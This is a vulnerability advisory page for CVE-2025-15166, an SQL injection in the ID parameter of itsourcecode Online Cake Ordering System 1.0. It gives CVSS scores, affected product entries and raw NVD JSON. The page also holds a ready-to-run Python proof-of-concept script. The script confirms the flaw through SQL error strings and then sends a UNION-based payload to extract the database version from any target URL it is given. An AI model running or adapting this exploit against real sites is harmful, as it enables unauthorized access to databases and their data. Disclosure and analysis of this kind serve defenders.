Security Vulnerability Report
中文
CVE-2025-15166 CVSS 7.3 HIGH

CVE-2025-15166

Published: 2025-12-29 02:15:43
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A vulnerability was found in itsourcecode Online Cake Ordering System 1.0. This affects an unknown function of the file /updatesupplier.php?action=edit. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:admerc:online_cake_ordering_system:1.0:*:*:*:*:*:*:* - VULNERABLE
itsourcecode Online Cake Ordering System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-15166 PoC - SQL Injection in itsourcecode Online Cake Ordering System Target: /updatesupplier.php?action=edit Parameter: ID """ import requests import sys def test_sql_injection(url, target_id="1"): """ Test for SQL injection vulnerability """ # Basic test - single quote to trigger SQL error payload = "'" test_url = f"{url}/updatesupplier.php?action=edit&id={target_id}{payload}" print(f"[*] Testing target: {test_url}") try: response = requests.get(test_url, timeout=10) # Check for SQL error indicators sql_errors = [ "SQL syntax", "MySQL", "Warning", "mysql_fetch", "mysql_num_rows", "syntax error" ] for error in sql_errors: if error.lower() in response.text.lower(): print(f"[+] SQL Injection vulnerability confirmed!") print(f"[+] Error indicator found: {error}") return True print("[-] Basic test did not confirm vulnerability") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def extract_data(url, target_id="1"): """ Extract database information using UNION-based injection """ # UNION-based injection to get database version and current user payload = "' UNION SELECT 1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16---" exploit_url = f"{url}/updatesupplier.php?action=edit&id={payload}" print(f"[*] Extracting database info...") try: response = requests.get(exploit_url, timeout=10) if response.status_code == 200: print(f"[+] Database info extraction request sent") print(f"[+] Check response for extracted data") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-15166.py <target_url>") print("Example: python cve-2025-15166.py http://target.com/cake-ordering") sys.exit(1) target_url = sys.argv[1].rstrip('/') print("="*60) print("CVE-2025-15166 SQL Injection PoC") print("="*60) if test_sql_injection(target_url): print("\n[*] Proceeding with data extraction...") extract_data(target_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15166", "sourceIdentifier": "[email protected]", "published": "2025-12-29T02:15:42.727", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in itsourcecode Online Cake Ordering System 1.0. This affects an unknown function of the file /updatesupplier.php?action=edit. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:admerc:online_cake_ordering_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "6990FB82-E8CB-4B16-B293-4DDDF0627D47"}]}]}], "references": [{"url": "https://github.com/LaneyYu/cve/issues/5", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.338545", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338545", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.721108", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.